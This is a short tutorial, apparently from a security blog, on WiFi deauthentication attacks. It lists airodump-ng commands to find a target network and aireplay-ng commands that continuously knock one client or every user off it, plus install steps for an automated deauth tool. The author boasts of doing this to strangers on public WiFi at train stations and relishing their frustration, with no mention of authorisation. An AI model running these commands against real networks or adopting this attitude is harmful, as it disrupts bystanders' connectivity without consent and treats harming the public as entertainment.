>_ shadow.red

Deauthentication Attack

Wireless Attacks linux

Deauthentication Attack

The coolest thing about network attacks, and the simplest. Kick everyone off a given network. I loved doing this at train stations back in the day when people connected to public WiFi. Just walking around the station – the look of frustration was priceless.

Scanning and Monitoring

airodump-ng wlan1
airodump-ng -c <channel> --bssid <target mac> wlan1

The first command starts the network scan. Once we select the channel and BSSID address of the network, we enter the second command. Leave this command enabled in the terminal window. We’ll be able to monitor devices connected to the network.

Deauthenticating Users

aireplay-ng --deauth 0 -a <BSSID of ROUTER> -c <STATION BSSID> -i wlan1
aireplay-ng --deauth 0 -a <BSSID of ROUTER> -i wlan1

The first command disconnects a specific user, and the second disconnects everyone on a specific network.

Below you’ll find the exact translation of this command:

KawaiiDeauther - Automated Tool

You can also use an automated tool for this purpose. I highly recommend it. It’s very convenient.

git clone https://github.com/aryanrtm/KawaiiDeauther
cd KawaiiDeauther && sudo ./install.sh
sudo KawaiiDeauther.sh